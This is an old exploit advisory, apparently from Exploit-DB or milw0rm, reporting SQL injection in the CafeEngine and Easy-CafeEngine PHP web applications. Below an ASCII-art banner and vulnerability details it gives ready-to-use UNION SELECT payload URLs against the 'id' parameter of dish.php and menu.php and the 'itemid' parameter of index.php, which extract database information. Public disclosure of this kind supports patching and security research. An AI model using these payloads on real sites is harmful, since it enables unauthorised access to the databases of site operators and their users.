CafeEngine - Multiple SQL Injections

EDB-ID:

6762


Author:

0xFFFFFF

Type:

webapps


Platform:

PHP

Date:

2008-10-16


   ___________________________________________________________________________________________________________
  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  | 
  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ | 
  | |   /  \/                                                                                                 | 
  | |  / _____________________________________________________________________________________________________|
  | | / /                            .: CafeEngine Multipe remote SQL Injection :.                            | 
  | |/ /______________________________________________________________________________________________________|
  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       | 
  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
  |/    Country:       Algeria                             .                                                  |
  v___________________________________________________________________________________________________________|
  |     Publication info :.                                                                                   |
  |___________________________________________________________________________________________________________|
  |     Date:          19-09-2008                          . Method   :         [*] GET   [ ] POST            |
  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
  |     Type:          SQL injection                       . Magic quotes :     [*] ON    [ ] OFF             | 
  |     Application:   Easy-Cafeengine / Cafeengine        . Risk:              [*] High  [ ] medium  [ ] Low | 
  |     Venedor site:  http://cafeengine.com/              .                                                  | 
  |     Version:       N/A                                 .                                                  |
  |     Impact:        Exploring Database                  .                                                  |
  |     Exploit:       Available                           .                                                  |
  |     Fix:           N/A                                 .                                                  |
  |___________________________________________________________________________________________________________|
  | Description :.                                                                                            |
  |___________________________________________________________________________________________________________|
  | Input "id" passed into dish.php,menu.php pages is not properly verified,                                  | 
  | a visitor can easily get sensitive information from the database by injecting SQL Querys                  |
  | ......................................................................................................... |
  |                                                                                                           |
  | CafeEngine Exploit :                                                                                      | 
  | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10                                            |
  | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12                                      |
  |                                                                                                           | 
  | Easy-CafeEngine Exploit:                                                                                  | 
  | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9                                          |
  |___________________________________________________________________________________________________________|
  | Notice :.                                                                                                 |
  |___________________________________________________________________________________________________________|
  | These publications are published for educational purpose thus the author will be not responsible          |
  | for any damage.                                                                                           |
  |___________________________________________________________________________________________________________|
                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
                                                 \____________________________________________________________|

# milw0rm.com [2008-10-16]